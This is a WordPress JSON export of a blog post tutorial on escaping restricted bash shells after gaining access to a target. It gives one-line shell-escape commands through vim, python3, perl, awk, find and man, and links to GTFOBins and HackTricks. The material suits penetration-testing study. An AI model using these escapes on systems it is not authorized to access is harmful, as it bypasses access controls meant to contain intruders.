{"id":192,"date":"2023-03-23T21:14:04","date_gmt":"2023-03-23T21:14:04","guid":{"rendered":"https:\/\/merrillnewman.tech\/?p=192"},"modified":"2023-03-23T21:20:56","modified_gmt":"2023-03-23T21:20:56","slug":"escaping-restricted-shells-via","status":"publish","type":"post","link":"https:\/\/merrillnewman.tech\/?p=192","title":{"rendered":"Escaping Restricted Shells"},"content":{"rendered":"\n

Overview<\/h3>\n\n\n\n

Upon gaining a shell on a target you may find that you are in a restricted shell. Restricted shells are introduced as another line of defense and greatly limited what you can do within a shell. In this post I will show a few different techniques to escape this restricted shell and gain full functionality.<\/p>\n\n\n\n\n\n\n\n

Restrictions<\/h3>\n\n\n\n

As you probably inferred, a restricted shell is restrictive is what it allows you to do. The default restrictions can be found within the bash manual page.<\/p>\n\n\n\n

\"\"
Default bash restrictions<\/figcaption><\/figure>\n\n\n\n

1. Text Editors<\/h3>\n\n\n\n

Some text editors have shell escape sequences which allows us to escape our restricted environment.<\/p>\n\n\n\n

\"\"
In a Restricted shell<\/figcaption><\/figure>\n\n\n\n

Here we can see that we are indeed in a restricted shell. To escape from here using vim\/vi we just need to start vim\/vi and run:<\/p>\n\n\n\n

:set shell=\/bin\/sh\n:shell<\/code><\/pre>\n\n\n\n
\"\"
Setting the shell variable within vim<\/figcaption><\/figure>\n\n\n\n
\"\"
Executing the shell within vim<\/figcaption><\/figure>\n\n\n\n
\"\"
Unrestricted shell spawned<\/figcaption><\/figure>\n\n\n\n
Here we where able to execute \/bin\/sh using vim to escape the restricted shell. Most other text editors that have shell escape sequences are follow similar steps.<\/p>\n\n\n\n
2. Programming Languages<\/h3>\n\n\n\n
If certain programming languages are installed on a system we may be able to leverage them to escape our restricted shell. I’ll list some of the most commonly installed languages here.<\/p>\n\n\n\n
Python:<\/h5>\n\n\n\n
python3 -c 'import os; os.system(\"\/bin\/sh\");'<\/code><\/pre>\n\n\n\n
\"\"
Escaping restricted shell using Python3<\/figcaption><\/figure>\n\n\n\n
Perl:<\/h5>\n\n\n\n
perl -e 'exec \"\/bin\/sh\";'<\/code><\/pre>\n\n\n\n
\"\"
Escaping restricted shell using Python3<\/figcaption><\/figure>\n\n\n\n
Awk:<\/h5>\n\n\n\n
awk 'BEGIN {system(\"\/bin\/sh\")}'<\/code><\/pre>\n\n\n\n
\"\"
Escaping restricted shell using awk<\/figcaption><\/figure>\n\n\n\n
3. System Binaries<\/h3>\n\n\n\n
Some of the binaries on Linux have the ability to execute shell commands, which we can use to escape our restricted shell. I’ll list a few common ones here.<\/p>\n\n\n\n
Find:<\/h5>\n\n\n\n
find . -exec \/bin\/sh \\; -quit<\/code><\/pre>\n\n\n\n
\"\"
Escaping restricted shell using find<\/figcaption><\/figure>\n\n\n\n
Man:<\/h5>\n\n\n\n
man ls\n!sh<\/code><\/pre>\n\n\n\n
\"\"
Executing sh from man command<\/figcaption><\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
These are some of the most common linux binaries you can use to escape a restricted shell but you can find a fill list here<\/a>.<\/p>\n\n\n\n
Conclusion<\/h3>\n\n\n\n
There are many different methods to escape a restricted shell, way too many to list within one article. If none of these methods helped you here are some links that have more techniques:<\/p>\n\n\n\n
https:\/\/gtfobins.github.io\/#+shell<\/a><\/p>\n\n\n\n
https:\/\/book.hacktricks.xyz\/linux-hardening\/bypass-bash-restrictions<\/a><\/p>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
Overview Upon gaining a shell on a target you may find that you are in a restricted shell. Restricted shells are introduced as another line of defense and greatly limited what you can do within a shell. In this post I will show a few different techniques to escape this restricted shell and gain full […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"hide_page_title":"","_coblocks_attr":"","_coblocks_dimensions":"","_coblocks_responsive_height":"","_coblocks_accordion_ie_support":"","_mi_skip_tracking":false,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-uncategorised"],"_links":{"self":[{"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=192"}],"version-history":[{"count":3,"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}